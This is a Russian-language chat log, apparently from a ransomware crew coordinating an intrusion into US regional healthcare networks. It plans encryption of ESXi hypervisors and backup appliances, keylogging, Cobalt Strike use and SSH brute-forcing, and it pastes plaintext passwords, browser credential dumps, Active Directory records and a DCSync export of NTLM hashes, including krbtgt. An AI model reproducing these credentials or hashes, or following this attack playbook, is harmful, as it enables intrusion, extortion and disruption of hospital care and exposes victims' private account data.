скину файлы:thinking:@user8 у тебя на контроле их задачи, спрошу с тебя)он пока за главного в этой задачев общем атакуйте вопросами @user8а, просто я видимо не совсем понял насчёт косвенной работыда мы ж рядом сидим)если ты об этом?я могу вам на 3х дать конфу по общим вопросаму них будут свои сетки, зачем к тебе в конфу?@tl1 раз уж @user4 и @user7 со мной, закинешь их в конфу может?okближе к 6-7 я дам сеть с ДА и мы будем готовить ее к закрытиюпо большей части сегодня самостоятельныя вам выдам файлики как ему вчера, по всем вопросам обращайтесь к нему@user4 @user7 вы косвенно работаете со своейтогда так @user3 работает с форумнетУ меня не получается пройти дальше, можно меня к user8 в помощь Вчерашней сеткой, с которой нет доступа в кобы я свободен(Наполнением форумакто у нас кстати чем занят?тогда объясняю задачи на сегодня+так, все собрались?hiВсем привет ждем до 20 мин и начинаемНа местезаходимВсем приветпока никого нет?приветрубрики нашли
esxi нет \нетесть движение?на есхы не катитесхнесфера[ ](https://mediaeveryone.com/group/1-done-crispregional-org?msg=7yppCGXDeHNw3hNpo) вот тут доступы фтпв есх не попали ещенет в рубриктак оболочка фтп то один?на esxi?по ссх там не линух а своя оболочка токая ссх и вебпо фтп пускает?второй рубрик
```
https://10.75.0.170/web/bin/index.html#/welcome
Admin
G0F0rw@rd123!
```рубрик https://10.1.0.171/web/bin/index.html#/welcome
admin
G0F0rw@rd123![ ](https://mediaeveryone.com/group/1-done-crispregional-org?msg=9zcmXRPSE2nomWzvh) не подошлиа через вцентр не было на них доступа?но на esxы они вобще не ходят, если только по ссхнет
в почте пусто, почта на gmail
кейлог повесилиесть движение?``
www.crispregional.org
ip207-70.crispregional.org
myhealth.main.crispregional.org
www.myhealth.main.crispregional.org
pocketpc.main.crispregional.org
view.crispregional.org
www.view.crispregional.org
vpn.crispregional.org
www.vpn.crispregional.org
webmail.crispregional.org
zix01.crispregional.org

``закидывайте на cmdна почте не нашли?прилично так2431 уникальных``
3675 Objects returned
``пользаков 3к вродеуникальных не считала сколько там уникальных хешей?не жирно выйдет?в плане по денежке@tl1 @tl2
для брута ссх на есхи можно пиздануть весь дсинк на кмд5?ну и на виме который вчера пошифвроваливторой пока вообще хз где и какпока ничего
ищес креды есхов
неудивительно что востановили
у них бэкапы на есиксах + два Rubric
в первом три кластера в каждый из них реплицируются бэкапытак ну что тут у нас?до понедельказавтра это во сколько?ну хорошосегодня я тоже не смогутогда завтраданашли esx'ы
но сегодня уже не очень хочется закрывать
там куча серверов и куча армов - часов на 6 затянется[ ](https://mediaeveryone.com/group/lrhc-org?msg=cvpLBAf6fAYTHaEQ9) едва-едва))у шансона мдб файлгде как?вроде нашли пароль от esxдо скольки сидеть собираетесь?как успехи?ну что живы?``
https://login.sophos.com/login.sophos.com/oauth2/v2.0/authorize,04/30/2020 9:53:35 AM,13232732015862662,smhanson@lrhc.org,Menu12762
``````
User name shanson
Last logon 12/18/2020 3:22:23 PM
 
User name gsnelson
Last logon 12/19/2020 2:57:41 PM
``если они сегодня заходили завтра тоже будутпроверьте последние ластлогоны нужных ребятвстроенный в кобальт вполне справлятся не?@tl2 у нас кейлогер есть?щас почту проверюна столе, на бумажке лежит))значит мог остаться в переписке на почтене хотят ребята хранить пароли от сферы``
Sophos
Shanson@lrhc.org
2476.Fgjd

```его - еще нетпочту то проверили? но там пустода яж говорю открыли эти файликипытался
но чет не отработало собакаhttps://snapcraft.io/install/onenote-desktop/ubuntu#installи еще ждем @tl2 вдруг решит вопрос)пробуйте залететь на эту тачку и посмотреть тамнетно паролей сферы там нетвы еще забыли про рдп по нтлм?тогда переходим к более сложным методамиз браузералол, подобрали пароль к файлику))ставьте на дедик и смотрите)вот такая штука``
https://www.bitrecover.com/free/onenote-viewer/
```я реально хочу кое че протестить))ну дайте пожалуйста .one файл этот``
Take the help of OneNote Converter
. This software allows you to read OneNote file without OneNote installation. This software also provides many advanecd features. With this software, users can easily convert OneNote to PDF, Onenote to DOC, DOCX, OneNote to Image (png, jpg, tiff, bmp, and giff).
``такая штука``
https://www.quora.com/How-can-a-person-read-a-OneNote-file-without-OneNote
``уже было с таблицей ехеля)файлик с паролями запаролен)есть мысля однакинь файл сюда пожалуйста.oneкакой формат файла?не катят с браузераа?мимик не работаетно нет его клиров6 часов идлтаймзаватесь по рдпи если там уже никого нетчекните время на тачке откуда забралипишет что не лицензионый софт у вастакНашли OneNote с записками про всферу, скачали но открыть не дает``
Host Name: PMA2013
OS Name: Microsoft(R) Windows(R) Server 2003 Standard x64 Edition
OS Version: 5.2.3790 Service Pack 2 Build 3790
OS Manufacturer: Microsoft Corporation
OS Configuration: Additional/Backup Domain Controller
OS Build Type: Multiprocessor Free
Registered Owner: Eleah
Registered Organization:
Product ID: 76869-644-7406004-50507
Original Install Date: 10/10/2013, 11:47:49 PM
System Boot Time: 7/27/2020, 11:46:57 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 4 Processor(s) Installed.
                           [01]: EM64T Family 6 Model 45 Stepping 7 GenuineIntel ~2300 Mhz
                           [02]: EM64T Family 6 Model 45 Stepping 7 GenuineIntel ~2300 Mhz
                           [03]: EM64T Family 6 Model 45 Stepping 7 GenuineIntel ~2300 Mhz
                           [04]: EM64T Family 6 Model 45 Stepping 7 GenuineIntel ~2300 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 6/22/2012
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT-06:00) Central Time (US & Canada)
Total Physical Memory: 8,191 MB
Available Physical Memory: 5,839 MB
Virtual Memory: Max Size: 11,827 MB
Virtual Memory: Available: 10,167 MB
Virtual Memory: In Use: 1,660 MB
Page File Location(s): C:\pagefile.sys
Domain: PMASC.LOCAL
Logon Server: \\PMA2013

```
192.168.0.247
какойто левый домен нашёл``
--- Chromium Credential (User: shanson) ---
URL : https://app.smartsheet.com/
Username : shanson@lrhc.org
Password : 2476.Fgjd

--- Chromium Credential (User: shanson) ---
URL : https://noc/
Username : lrhc\shanson
Password : 279.smh

--- Chromium Credential (User: shanson) ---
URL : http://10.10.36.11/
Username : 8523
Password : 1919

--- Chromium Credential (User: shanson) ---
URL : https://login.oracle.com/
Username : shanson@lrhc.org
Password : 2476.Fgjd

--- Chromium Credential (User: shanson) ---
URL : https://lrhesx7.lrhc.local/
Username : root
Password :

``[ ](https://mediaeveryone.com/group/lrhc-org?msg=jzfMpvvypunrxQXcA) хороший вопрос на пиши заявку в конфу+ гоферкак только все подтянете уже начнется шумя ж так понимаю, что весь шум от того что он в дохера потоков работает...ну если заранее всё подтянуть и замапить, то вполне, разве нет?а наши програмеры не могут его поднастроить чтоб шумел поменьше?за 6 часов успеете после запуска?)т е за 6 и 6 на сам процесс ехеи вы либо доделайте полностью все за 12 часовкак только запустите сразу начнется обратный отсчетто мне гофер кажется уже не такой и плохой идеей))угу, мы все порты отсканили и я в каждый стукнулся...бляханету на сфере ссш1) ставишь себе winscp софт
2) кидаешь сокс из сети (лучше с тачки какого нибудь технаря или даже ДА)
3) прогоняешь креды всех причастных к сфере на 22 порт по ип по одному разу одна пара доступовтогда следующий квест для тебя) ты будешь лезть в линуксдавай якто-то один нужен мне как доброволеца трогался он совсем недавно`Thursday, December 10, 2020 8:59:03 AM`называется вцентр а админка от esxiзначит точно в работе или они бы его 5 лет не держалион у них как миниум 5 лет)``
Monday, March 23, 2015 3:30:26 PM
```попутал)я же лично скинула нетдавно всем было понятнотак и?бля LRHV CENTER1 вот так ...```
dn:CN=LRHVCENTER1,OU=Infrastructure Servers,OU=LRHC Servers,DC=lrhc,DC=local
>objectClass: top
>objectClass: person
>objectClass: organizationalPerson
>objectClass: user
>objectClass: computer
>cn: LRHVCENTER1
>description: lrhvcenter1.lrhc.local
>distinguishedName: CN=LRHVCENTER1,OU=Infrastructure Servers,OU=LRHC Servers,DC=lrhc,DC=local
>instanceType: 4
>whenCreated: 20150323153026.0Z
>whenChanged: 20201210085903.0Z
>uSNCreated: 70143429
>uSNChanged: 4266849973
>name: LRHVCENTER1
>objectGUID: {4207C326-1250-45A8-B8DD-A8CAE3E8BEDB}
>userAccountControl: 4096
>badPwdCount: 0
>codePage: 0
>countryCode: 0
>badPasswordTime: 0
>lastLogoff: 0
>lastLogon: 132525179438078873
>localPolicyFlags: 0
>pwdLastSet: 132515225330348320
>primaryGroupID: 515
>objectSid: S-1-5-21-11880765-1498958316-1734353810-13045
>accountExpires: 9223372036854775807
>logonCount: 6778
>sAMAccountName: LRHVCENTER1$
>sAMAccountType: 805306369
>operatingSystem: unknown
>operatingSystemVersion: unknown
>operatingSystemServicePack: Likewise Open unknown.unknown
>dNSHostName: lrhvcenter1.lrhc.local
>servicePrincipalName: HOST/lrhvcenter1
>servicePrincipalName: HOST/lrhvcenter1.lrhc.local
>objectCategory: CN=Computer,CN=Schema,CN=Configuration,DC=lrhc,DC=local
>isCriticalSystemObject: FALSE
>dSCorePropagationData: 20201104221959.0Z
>dSCorePropagationData: 20200814152314.0Z
>dSCorePropagationData: 20190403161636.0Z
>dSCorePropagationData: 20180822143249.0Z
>dSCorePropagationData: 16010714042017.0Z
>lastLogonTimestamp: 132520643431981435
>msDS-SupportedEncryptionTypes: 28
```дайте инфу об сфере из ад инфоВот что странно, я ковыряюсь в админских шарах, у них там куча инсталлеров, куча скриптов для установки/отключения обновления и пр. но разу не попалось ничего связанного с vsphere или veeam...окей`ДА - ЛА на трасте` значит такюзер nmsapps админ на дкзначит группа ДА - ЛА на точке входав этом домене катят креды от lrhcсмежный пасс у ДА в разных доменах, керб, ДА - ЛА на трасте?старым дедовским способом `shell dir`как прошли?отлично``
[DC] 'ELEAH.LOCAL' will be the domain
[DC] 'ELEAHSERVER.ELEAH.LOCAL' will be the DC server
[DC] Exporting domain 'ELEAH.LOCAL'
502 krbtgt e8918ed4b8b1668372062801927f63a0 514
1001 SUPPORT_388945a0 7729dd0e99ae60caf19c16a092806ec3 66050
1606 IUSR_LRHSERVER 5aa5a0b9479b650986ff3813c1001099 66080
1605 IWAM_LRHSERVER bcd628fd257150c2a675f7d5f690ef7f 66080
1003 ELEAHDC$ 94bd64ce8fa6418a4684738c09cc43d2 4096
2105 D97Y5YG1-ASHLEY$ 4c50c09420686cd0a57d4d274f1200eb 4096
2151 BSS-DELL-LT$ 759debf0dd78790e21d6b4f6587a2080 4096
2154 TMM-LENOVO$ ec3478f99f1417c00bf4675c8bfdd111 4096
2166 ELEAH-100$ fb42aff93322daebf4b1c2b04381ed04 4096
2173 ELBOW-EVA$ 8bcd6e801a600896ffa2121767eb3397 4096
2147 ELEAH-2C0CBE034$ c8475d926cf8c01281797701ee6a9d3d 4096
2175 ELBOW-101$ 20f05f5be373ac86bb1b191f74ad0ac4 4096
2182 CIS-1$ 430cdb97aaab660ed9b431e19914fc36 4096
2184 TMM-6400$ 17f53fe9a7d61bff56bdc274cb085712 4096
2150 HOFFMANCLINIC$ 8853f2ea7eb67386d9492a33c662449c 4096
2123 ELBOW-31$ c36dca6a0fb368486a6b1277fbcf8aac 4096
2178 ELBOW-81$ 067da0f2f070e5a7701ef7fdffc88b95 4096
2193 LIME$ a271cef0c286ce9bb1313ba2a2146613 4096
2197 E6400_TMM$ 154b55c6ee70c8348d2cd73ff37cbd37 4096
2202 WebAdmin 83fdf8f37840cf8e171223c0de1b16eb 66048
2141 PAM1$ 6d680f3785c558d60be1089f85be680b 4096
2104 D9NRDNH1-BSS$ 6d2a65c5202a1e20f9571d1aadacb30e 4096
2211 ELBOW-114$ e9788cba0ebac08894ac2594f84a2d13 4096
2210 BSS$ 1253830b83d4a50d0d5d89a5ffebca2b 4096
2131 ELBOW-23$ abaa96e48dcd800a1956368691e830c8 4096
2140 MLS1$ 23f85b04f30c79f4bcd84b7b7d5e888d 4096
2220 ELBOW-57$ f795c9c36119d3aca086f0b815678378 4096
2217 ELBOW-14$ 39151df3ef17c84716df58ea56e8a415 4128
2149 ACERASPIRE1$ 5f174595230b7af9e7da590c67cec747 4096
2232 LCA-TABLET$ 0eb7d994c7c21ecf65f24f403496993c 4096
2235 IWAM_ELEAHSERVER fa33eb92bc4e33cb808ae4f426f52974 66080
2185 TMM-E6400$ 4b3d39b7ac88fb0eab91cbb1e7832181 4096
2234 ELBOW-DEB$ dce6fa3ecaf59fee0beb6eef23ff11e1 4096
2129 ELBOW-18$ 3d7a43744425f993ccebc658f7cefef3 4096
2192 ELBOW-47$ 54012bc42e85be99b28c6100fe8595ff 4096
2112 ELBOW-122$ 06d1aceb9425cda01ac3ab1ba38343dc 4096
2207 ELBOW-90$ 4d801bd38128d0226f3b3355c1688ff2 4096
2177 ELBOW-322$ e4bb9151c5a6932431bfb352393ecba6 4096
2233 ACER-TMM$ d1418266362c9a75462ff5c6db09fe64 4096
2273 ELBOW-00$ aa97eb43126e70b34962544040117143 4096
2309 ADMINLAPTOP$ 90f4876c62856294b790f6e4d105541d 4096
2180 DFQH7SF1-CHERY$ 26e95f4d404c4a115d7d29381e8ac0cf 4096
2277 AC45A1CA-9A0C-4C9B-8 2ffb9c1ae2b5840acf2e0748129bba60 514
2361 ELBOW-123$ c419b2a25695936ef44e6c4f3cbde7d5 4098
2363 ELBOW-124$ e7b696f8741f96c95bab7f6421b4e209 4096
2367 ELBOW-128$ 087348e7f655e3770d9bbd66541d0e12 4096
2368 ELBOW-151$ 3b01e7331b20d40450330468969788e8 4096
2374 ELBOW-131$ 9fbc5a76dde43637aa57bffda728ea88 4096
2114 ELBOW-11$ ea367a201981ebe6aa92053c1b21493d 4096
2158 HOSP-PHARM$ b1c6e3798e4931af5e3b16eac81c9c6b 4096
2189 LBERG-LENOVOLT$ 590f000e8ee72aaabb71e3c28e2137bf 4096
2142 ELBOW-30$ 201cc04cecc2bb10b2a9c9cdf50a9613 4096
2397 MOTION1700$ 9ebfca863d35ba58227dcde5b5d46efc 4096
2155 MEDIC-AIR$ 377877e93baa394efafbfcd77902d500 4096
2396 YOUR-T0YNI9DL4P$ 63928409f36d079b113f478ac545298a 4096
2206 ELBOW-34$ 1c6bcb4d36722b0e9dc5e59fdf18cacc 4096
2162 BIOLAPTOP-$ 29806235ecbc6d6340dfabb57f1c6927 4096
2244 ELBOW-59$ 62b601c27f74069136888a5b72db4797 4096
2209 ELBOW-54$ 952bbb508c6a48d5a72d5124f31edace 4096
2169 ELBOW-52$ f71f643018f02de46e081592812e0cc6 4096
2501 GREG-PC$ c594a1965f7c3fb23ce0dcb70207f57e 4096
2517 ELBOW-163$ 8f3dbbc6aa56fb7ccc030ba6c252d1a8 4096
2219 ELBOW-56$ ae7f06593d96e4fd64e60f0e21adb847 4096
2132 ELBOW-22$ 918f0ec2257a3338783de0af42fbba78 4096
2133 ELBOW-17$ fff2b2fc2ed9c6379f9274f16330fd14 4096
2191 ENCORE-XP$ 541136d932e9448cc178c833553b7331 4096
2134 ELBOW-16$ 6df9d74345c0d961c612433220af1fc1 4096
2165 ELBOW-39$ 30b840855273c13f5c67a4c9e025e67b 4096
2607 TERMINAL-VM$ 2073bd7749217b74916e91b17730fdae 4096
2606 PRAIRIERIDESP$ 38032fd1b9214dfa80d2607b791e9e6f 4096
2558 ELBOW-180-THINK$ fbd70668c408fea7c55276c7be780f2f 4096
2615 WINSERVER2012$ be09c89120c41f54c60d06ab4c5c0081 4096
2709 PRAIRIE-CCDA40D$ d6765c500e6625747f6dea6a9806dcad 4096
2370 ELBOW-133$ 9bff137ddce8110f35f734d2b7284d2a 4096
2637 ELBOW-256-2013$ bce01b884962dde1e8450620e018fa8d 4096
2270 LARRY-PC$ 979798807909392c993f9e1c3241a1b7 4096
2110 ELBOW-4$ 68818556c560fd8035e555f37b82ae45 4096
2738 ELSTERILEWKRM$ 13fd5fa6b22fd54e4c51b2cc31ace535 4096
2748 EL1F30$ 7e48f2391697a2f95c6ae1252c8c53fc 4096
2824 ELXX$ 0fac33f533439089096db7201e96afcb 4096
2456 FUJITSUTAB1$ 115d8606dd3e43a6891f54822dc29f4c 4096
2600 ELBOW-SCHOOLNUR$ 504233b467d9a3644003caf73a2be6e7 4096
2267 ELBOW-HOF$ 8d2b6da430466199702322aebfd7cd7c 4096
2747 EL1F31$ a90f7c64f20367a886d59bde26258127 4096
2695 TOM-THINK$ eb69e6af6620def9fa500df24f8f6429 4096
2153 ELBOW-41$ 8e78f6dd19f63f84fd67d5463d89a93a 4096
2869 ELBOW-330$ cbaed6fcf9bf608a0729b51d7ce3d3b7 4096
2882 LENOVO-TC-PC$ e303853867f813bbbdf6b1c092695d79 4096
2883 LENOVO-THINK-PC$ b0ee178054f615cd864811cb36addb03 4096
2884 LENOVO-EL-PC$ fb5ac93d067bae2265535df6c593f395 4096
2120 ELBOW-25$ 8c23af14df01cbf72e5a9259f27a08d7 4096
2892 DELL-VOSTRO-PC$ 489b9dc3d13f8e928f4dad56921ff98d 4096
2638 ELBOW-255-2013$ d55aba3efaf1dbcaeedc4dca0e7c83c3 4096
2121 ELBOW-33$ f43201f6c17d1da7f0073e6e3e92018a 4096
2762 ELC217$ a41fdab242eb2a5f59ff989cca668114 4096
2589 ELBOW-242$ 17138a59c75d8a84714e3e1791772c44 4096
2629 ELBOW-250-2013$ 4041e13faf3b2a4932b930d2ef41c4e5 4096
2742 EL1C30$ cecabded1f57b741910979d4e77a9b70 4096
2156 ELBOW-44$ 276ca91bd9cc90e7a2b690147e76cf4c 4096
2719 IT-LOANER$ e19c979e2e57e004b2975a33310a86a6 4096
2108 VOSTRO$ b0e18e40a78a2ee34b38ce4bb6df19a6 4098
2682 EXCHANGE$ c80b539c79899052a2a96edd987a95ce 4096
1244 SERVERTEST$ 6fa03485aefe980bc25576c412d5b3bc 4096
2605 XPVM$ 2420e0944baddf1bb4541a732e13a386 4096
2927 INFORMATION2B$ 6a6f2be454cfb60e98eafeca0c271459 4096
2727 ELBOWIP-113$ dcc5dbe4b040c60e3b548e59b0c79539 4098
2187 ELBOW-43$ 11b98d6b7a584abc5c444d4ce52c2190 4096
2272 ELEAH-985FEB5BB$ 5a0f6654fdece737c1f234d8e19906dd 4096
2987 VOSTRO-ER-PC$ a1e4b1bcf112ecebcd16f3c81276e7ac 4098
2992 PRAIRIEMED-PC$ 230356d29ff0f9b673dc6739cdc078d0 4096
2994 SPARE$ 7a1cf21e9b6206e13401a4931c07e146 4096
2993 LENOVO-ERBACKUP$ 49d11b67306bf133e7e0840966ac0f85 4098
2995 LENOVO-002$ fe514e8aab91e66c08312162f50b2c0c 4098
2959 ELBOW-88-PC$ 08c41b9fcf57df303805a9350c97161a 4098
3002 PTECH$ 605d47222050d1b67aa5f48629c5ff0c 4096
2831 ELBOWAVG$ c46098da8d85b9eff3b6bc0b255bf37b 4096
2172 ELBOW-515$ f915a4db39961f0d6a8b6160e810af1b 4096
3009 LENOVO-MORRIS$ e40cac82163ce2151668ae6f234a209e 4098
2274 ELBOW-6B609A4D4$ f9075e30a04d550f4c1b1b7bfd2430f0 4096
3010 TECH-PC$ fb050149675fcaa38b7efe9821ec4cf4 4096
3004 LDBLAPT-PC$ 5c9a4bcd1b529dc433caac2acbde7aea 4096
2122 RADIOLOGY$ a64dd04291e5d9dcb9e958f97330afd7 4096
2798 KATRINA--THINK$ 0c9b2cc9c193c810afefbeaea11a150f 4096
2384 ELBOW-138$ 84ab8c5a6424612bc133a5fd73b45bc4 4096
2375 ELEAH-53$ f34eb423b56a5c4a1002f77537dab3f4 4128
2125 ELBOW-VOSTRO$ 56f708a224408677101d13d2516685da 4096
2269 TMM-LTE6400$ b56bed280f295cab8f13fd520bc380ec 4096
3018 MCTRANSCRIPTION$ 2f9f464c0ea734d6f1076afea884b078 4096
2905 ELBOWDELL$ 332bc90c22e2198c079f32a2d1c5b2e7 4096
3061 SVOLKER$ 41a8fdb2be919a751311c8388616df56 4096
1234 nshaw 7ce21f17c0aee7fb9ceba532d0546ad6 66082
2135 ELBOW-7$ 5c5171c91a00986633147bc1e59069c9 4096
2630 ELBOW-251-THINK$ 961b3fef4e9ee0596464769fcc0fcb6e 4096
2389 PT-603$ 2c50f2ff4eee17d583f6aab895686701 4096
3015 JAH$ 7364e85b292df298424f85c8df07b044 4096
2128 ELBOW-20$ 38bc18ce27b88900332220d41b6dc2a7 4096
2163 eleahadmin 56ed04d8382aa5c79b45b972f505d5e8 66048
2194 ELEAHPARAGON$ c490069946a11c1ead7de5fbb1c18f25 4096
2923 ELBOW-8-PC$ 8763f93fd186f370cc82d61dfb1ad1d8 4096
3112 ASHBY-500$ e5d06448b6e7e2fbe2f4ef7d6da860da 4096
2838 KWANDER$ 318366c8a69789510ab9a809bb9f32d6 4096
3060 MANDY-THINK$ 262e4b26eba2bf0b26992026bcdeca4c 4096
3037 JUNEZLAPTOP$ aaf2cd45ce795eb783cd54e847014328 4096
3124 JJGINGERICH$ 6178ac05ff66c0c0eb6936890613e834 4096
2435 CONFERENCE$ a75484e8761eebc11a2298273f827a01 4096
2998 ELBOW-PHARMACY$ 91126f5018be5c73c705661048e68627 4098
2917 LENOVO-2-PC$ fd9885b3fea93e9628bf3efeda4989af 4098
2608 7VM$ 258fb5c3abf2ad99256c000adc3e3c33 4096
2918 LENOVO-3-PC$ 3a1c35a6a4f1d2ed1ee2f8b9307c7749 4098
3138 SOLARWINDS$ f61fc51c8c0013d26e23f1ea3ac5eead 4096
2534 ELBOW-10$ 516460f2c7647b731edcc68277c7323e 4096
2388 ELBOW-143$ 4d64f0c50cfe77adf35854b511fa55cd 4096
2668 WORDSERVER2$ 46442a45f3cb9e2f7b07dbcc9ad54810 4096
1205 admit 7814985632c77ea80185b422fb2341ce 66080
2354 copymed d4037c73ef369d1c80ffd3053d038f9c 66048
2460 timeclock a9e033fc6f050b0e4fb5eb6a8c6065ee 66048
2136 provider f2325f4793903c5e7f7f3ab62ba39e02 66048
2896 review 0c05952f0ef5da033b14ec18bc32d4b1 66048
2467 Email 43d328e11e86b309cc19c247182fa9de 66048
2382 ELBOW-136$ 90fcf3de2ff792bdff5a4f8aca37a492 4098
3001 HOSPITALCONSULT$ babfb1662026c5dec32d5b811616a241 4098
2780 EL-HOSPCHART$ 9e3bd0ddf713073ff0850d5a5d1544b3 4098
2428 shawn 4658fc68d553a589b05122c9d3c8f7f1 66048
2457 FUJITSUTAB2$ c7b1a276f4d80e172e9a5e1e2534b555 4096
1204 xray beacd80369761138f6bb0aab8fc6210e 66080
3091 ELBOW-IT$ 3be52c9fb1e361168acc8406283a0647 4098
2385 ELBOW-139$ b73c0139ea4aa91efab42ec9f5068787 4098
3188 Scope2 7ce21f17c0aee7fb9ceba532d0546ad6 66048
2170 TECH$ d272014a8e7456a476497345a94a6641 4096
3174 THEDON$ 46abc5d7c7f7add082140e725132220b 4096
2392 ELBOW-146$ 9cd2b64083ae4febe3e9c3059f498859 4098
2912 1C30$ 26ecbe63ddd019d802690a97f8b36775 4098
2909 aholmes 64f12cddaa88057e06a81b54e73b949b 66048
2679 julrich de80b750f2d4a560062938a039f927ff 66048
2726 certegra 6a4da7a5af13fcc63e338705e64b9e64 66048
3170 ddcalerts 1c2f7f3b20a7a3c512c72c6551d5c8ae 66048
3175 jjacobson 49c2d216cbfd307353083901f4f13d38 512
2411 jlarue 58e8c758a4e67f34ef9c40944eb5535b 66048
2548 lerlandson a453f0a097a730833462ee1fa1f8e46a 66048
2482 mmouser 1203e31cf67f3296cdb4a92acaaf7147 512
3057 diabetes c241e32aa0bc4b2b50e678bcf840aa53 66048
3099 payercredentialing 970f8602fff271c199fb67c2c3e05b37 66048
3008 MCMR 64f12cddaa88057e06a81b54e73b949b 66048
2968 avgadmin 737cb5a48ab7b6364a2fa4d7cca34a5e 66048
2843 jnelson 8846f7eaee8fb117ad06bdd830b7586c 66048
2915 alien 64f12cddaa88057e06a81b54e73b949b 512
2409 tjohnson 73f430069cede14071df88a3fb8d1803 66048
2445 Board ea53eeaa4f25fb7493bd1ef6e513a83f 66048
2481 jcglynn 3bdbd1fcbf257122874eadd06d2f4438 66048
3089 prhhser 7ce21f17c0aee7fb9ceba532d0546ad6 512
2974 avg 737cb5a48ab7b6364a2fa4d7cca34a5e 512
2304 BESADMIN 02dfa0279cbc348532805ba7e2beeecc 66048
2357 info 737cb5a48ab7b6364a2fa4d7cca34a5e 66048
2664 kvigen 8846f7eaee8fb117ad06bdd830b7586c 66048
2667 dhaberer dfa4590739879203a5a97ae43ee464ba 66048
3100 medicalstaffservices fa29511ec929bf3bc6ac14823798d54a 66048
2996 elrad 7ce21f17c0aee7fb9ceba532d0546ad6 66048
2654 mcieniawski 4bea8d5d69ea47eeefe4a249eb732a44 66048
2407 shuseth e22e04519aa757d12f1219c4f31252f4 66048
1203 no1 db74c9408655f77f65b01d248fa459df 66082
3062 mmortenson 64f12cddaa88057e06a81b54e73b949b 66050
3036 kkalahar 64f12cddaa88057e06a81b54e73b949b 66050
3115 msterns 64f12cddaa88057e06a81b54e73b949b 514
2571 kpederson 0e616d815995bc636d891185c04bcb1c 66050
2195 mtsuser d5c314bd582ad9c6f7b7967e0d9233bc 66048
2201 ELEAHNTIERSRV$ c5caaec60e139aa803823ec85214f537 4096
2568 ELBOW-190$ 41342409b0261d4aad3b633c1010fda1 4096
2130 ELBOW-21$ 655d4814b1f0e20c0e334c54427c8e82 4096
3034 VIDEODRIVER$ bd848b672e04f5636f0b6666bdc2618d 4096
3219 ELBOW-SD$ 221bcf159b5d6fda008ba0d49161404c 4096
2144 INFORMATION2A$ 3cd37ac763a2041d929944a72c7e2aa1 4096
3234 ELBOW-500$ be6aaad23b2dda0cb933a5cec656f04c 4096
2561 ELBOW-182$ ce3fcee953efe2970b55307afcbb4fb3 4096
2921 jkohlman 64f12cddaa88057e06a81b54e73b949b 514
3053 mcd 5d471f25392112557cfff181f2c65f8b 66048
2532 ELBOW-170$ 1d8b438aed82cb116e958e68bf3493c9 4096
3132 ELBOW-141-2$ 48336b25be905800de3523d16b6a77a0 4096
3161 clohse 74b97c4ce24198d4af22db7910f3ef75 66048
2127 ELBOW-27$ 9b5a13c18b574af93a68dd310465fbf9 4096
3220 TRANSCRIPTION1$ 89005c049fa3bdd0e7288d0bf388c34f 4098
3224 ELBOW-212$ 0802cf5f4b34cc2cba98046f705baf1d 4096
2770 STRESSTEST$ 740be6b211f25ed8d3ab9c26237108fc 4096
2564 ELBOW-185-THINK$ 2160262d8cfdb5303e2081a4254378b4 4096
3033 JUNE-THINK$ f3b06aa4eb5bd2016a2e8f996bf5c2a4 4096
3135 ELBOW-2$ 9d3abf189b5dfb02ee3df6bf1e5fa3ad 4098
2592 ELBOW-48$ 7be6eccca6c9bc1daf8ac02aebdb788b 4098
3298 PRHELBOW-2$ f34babc74e79e1bff25cdac38e7f2448 4098
3299 PRHELBOW-48$ 07239f5dc88877d6d77057198060e83a 4098
3123 ELBOW-50$ fc6bba7639dab76d8b2ab18d3dad3545 4098
2559 ELBOW-181$ 1a23e4b2b3d1ec604b104533f9d375c2 4096
2429 michelle 91a2fe075906348f700df87131f9e3aa 66050
3325 PRH-ELMAINT$ b9f3237534a6f560b7bccd0c542e4856 4098
3255 PRHELBOC$ 29ac65f69caeafcea616aac37735e279 4096
2973 TANYA-MED_RECOR$ c706038eac16273895a8d1359634fee0 4096
2870 ELBOW-HP$ 3c9dfa6e8b6b59d74aa9a3e376c95acf 4096
3304 PRH-MORRIS-161$ fb8651559b7a4a338882d317017ef7c0 4096
2771 MCDICTATION$ 47c542f936dbc80bb58528d2c135c647 4096
2916 PFANDRICH$ 35a29c9bab2a15e221490b49698b48 4096
3283 PRH-0722$ c5850ee75e307f7ed07e4df6b49fe778 4096
2183 IUSR_ELEAHSERVER 7bde30ce679859e2e2709754e03947c8 66080
2544 PrintTrackerUser 082c7aa6b7f33ecd8b755a7dc4a306ca 66048
2685 Terra 706f1095c72c4f53f69a6a092247adf9 66048
2842 humanresources 5807656e188c4df45829c2ae81b8ca4f 66048
3286 hjohnson 64f12cddaa88057e06a81b54e73b949b 66048
3322 compliance ae974876d974abd805a989ebead86846 66048
3289 PRH-1396$ c69e70900aee70ed6b3ffb2583ee83a0 4096
3000 AVG-VM$ 30f54bf05fb4fbf5a04bd48534efd074 4096
3023 PRH-2927$ 52cbc9d4032b2d41bb701951549de704 4096
2188 PRH-0046$ a38371211c659ce1e7e036d9c64ff1dc 4098
2394 CPADMIN-PC$ 0f179883db0462cf49078e639ec25428 4098
3198 vnollmeyer 64f12cddaa88057e06a81b54e73b949b 66048
2360 PRH-1414$ 8e955b16a6d991a3b9aebb4992497b27 4096
3109 PRH-3046$ d4220da0c3c1d87f3c3a2c1b600610f2 4096
2111 PRH-1140$ 9cc636f6347b2b680c2c2064cf6d20dc 4096
3177 jeffdoe 7ce21f17c0aee7fb9ceba532d0546ad6 514
3236 PRH$ 64f2681a4186e460accaef0647cbac19 4098
5613 dlambert 5ca241a638da398b2275af36914a1d94 66048
2218 PRH-2043$ 8638dff71e87f75de19653f44831f1 4096
3300 PRH-0745$ cbf6b832614b14c9b80fccac6b3a8a18 4096
2830 dorandi 64f12cddaa88057e06a81b54e73b949b 66048
3111 PRH-1015$ a236ac1e531fd33b64753dab8593cd03 4096
2681 PRH-2929$ 6b7a65a63847d1a68ad8c7a550abfa35 4096
3305 PRH-EL-724SVR01$ 580aeb99e976cdb5f9bc513b9bc0aa69 4096
6611 akalar be32ce64dbb635e13b68816e373cf6e7 66048
2868 PRH-0755$ 709c155776e97022c6adb2f0584f4f0a 4096
4621 ddeuser 50f2d3d34a6757661726402cc800f1af 66048
3363 PRH-2980$ 22a4f3d6c4c1212fc9871ec9a63f7ad1 4096
4625 PRHHS-PC$ 6adaf3e183c21740d0c6189a5f662c07 4096
